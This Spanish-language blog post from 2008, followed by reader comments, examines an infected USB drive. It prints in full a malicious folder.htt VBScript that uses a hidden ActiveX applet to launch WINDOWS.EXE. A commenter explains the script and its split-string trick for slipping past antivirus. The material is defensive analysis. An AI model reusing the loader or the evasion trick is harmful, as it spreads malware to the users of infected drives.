jueves, 27 de marzo de 2008

El otro "autorun"

Ayer en el trabajo me dieron para plotear un archivo en un pendrive. Cuando lo abro (con vista de ocultos y de sistema), me encuentro con que tiene sorpresas:



Investigando un poco, veo que tanto copy.exe como host.exe son troyanos conocidos, que precisan de un autorun.inf para arrancar. Raro que ese archivo no estuviera. El que sí estaba (y el que más me interesó) era el folder.htt.
Tras un rato de pelearme con este archivo, no pude borrarlo, ni verlo bajo windows, Trate de abrirlo con un editor normal, con uno hexadecimal, con un recuperador de datos (getdataback, que viene en el hirens), haciendo una imagen del pen...nada. Así que arranqué con slax, donde los archivos son archivos y uno puede hacer con ellos lo que quiera.
Desde ahi borre lo ejecutables y le eche un vistazo al .htt, que lucía así:

#html#
#head#
#meta http-equiv="content-type" content="text/html; charset=UTF-8"#
#/head#
#body style="margin: 0" scroll=no#
#object id=FileList border=0 tabindex=1
classid = "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100%; height: 100%" tabIndex=-1#
#/object#
#/body#
#/html#
#script language=vbscript#
document.write "#div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'##APPLET NAME=L HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent##/APPLET##/div#"
#/script#
#script language=vbscript#
On Error Resume Next
Dim path
Path = ""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)+"/"
Set AppleObject = document.applets("l")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
sd="w"+"sshe"+"ll"
Set sd = AppleObject.GetObject()
sd.run(Path + "WINDOWS.EXE")
#/script#


(cambié los simbolos html por almohadillas para no confundir al editor)

Dada mi absoluta ignorancia del lenguaje VBS, apenas puedo intuir que el script sirve para correr un virus llamado "windows.exe" en algún path extraño, aprovechando una vulnerabilidad vieja del internet explorer. Aunque es posible que sea solo una personalización de carpeta algo extraña. Si alguien sabe...avise, por ahi mis lectores y yo aprendemos algo.

Un pequeño offtopic: Aprovecho para agradecer a la gente de EnElMostrador y a los del C.A.U por el premio-meme en el que me nombran. Voy a permitirme también no seguir la cadena, si me disculpan.

4 comentarios:

CoskiBukowski dijo...

Los virus/worms/troyanos autoejecutables para pendrive son una verdadera plaga actualmente. Actualmente estoy trabajando en una radio donde hay una PC para pasar la musica y demás. Resulta que un pendrive la infectó, y durante vaya-uno-a-saber cuanto tiempo se la paso infectando cada pendrive que los conductores de los programas llevaban para copiar publicidades, temas musicales o artisticas..
También, mas o menos la mitad de los reproductores de MP3 o pendrives que los amigos de mi hno traen a mi PC, estan infectados. Por suerte uso Linux y simplemente borro los archivos, además de avisarles a los dueños y quizas pasarles el instalador del Avast.

Saludos!

Anónimo dijo...

Buenas.

Sin entender mucho de VBS lo que hace es sacar la letra de unidad del pendrive para ejecutar el archivo windows.exe que está en raiz. Coge el path entero del archivo .htt y le quita los 11 ultimos caracteres que son el nombre del archivo y la barra, asi se queda con la unidad X:
Luego lo que hace es llamar al wsshell pero la variable la pone partida para que algunos antivirus se la coma sin detectar la intrusión.

Todo el texto del principio es creando el applet de tamaño 0 para que no se vea.

Saludos.

[486] dijo...

Gracias por el aporte anónimo! Ahora, después de la explicación, está claro. Y queda claro también que todavía me marea el código en cualquier lenguaje. Saludos.
Coskibukowsky: ¿qué virus?¿Cómo arranca?¿Tenés una copia del autorun.inf? Solo por curiosidad... que es lo que me hace escribir acá...

CoskiBukowski dijo...

Perdon por la demora, siempre olvido tildar la casilla de seguimiento de comentarios por mail, y no me entero.

Te comento que no conservé ningun archivo, pero recuerdo que el ejecutable se llamaba fun.xls.exe (doble extensión a proposito), seguro que lo podras localizar en cualquier "virus-pedia" :P

Tampoco estoy seguro de qué era lo que provocaba, ya que al poco tiempo formatearon y pusieron antivirus (norton, jajaja!, pero detecta ese virus, lo comprobamos cuando alguien inserto un pen infectado previamente, sin saberlo).

Salu2